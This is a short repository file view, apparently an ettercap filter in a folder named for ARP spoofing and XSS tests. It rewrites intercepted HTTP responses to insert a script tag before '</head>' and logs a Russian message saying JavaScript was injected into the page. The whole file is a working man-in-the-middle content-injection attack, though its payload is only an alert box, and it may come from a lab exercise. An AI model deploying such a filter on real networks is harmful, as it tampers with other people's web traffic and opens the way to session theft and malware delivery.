Files
SPOOFING/arpspoofing/xss_test/inject.js

5 lines
160 B
JavaScript
Raw Normal View History

if (ip.proto == TCP && tcp.src == 80) {
replace("</head>", "<script>alert('XSS!')</script></head>");
msg("Внедрен JS в страницу!\n");
}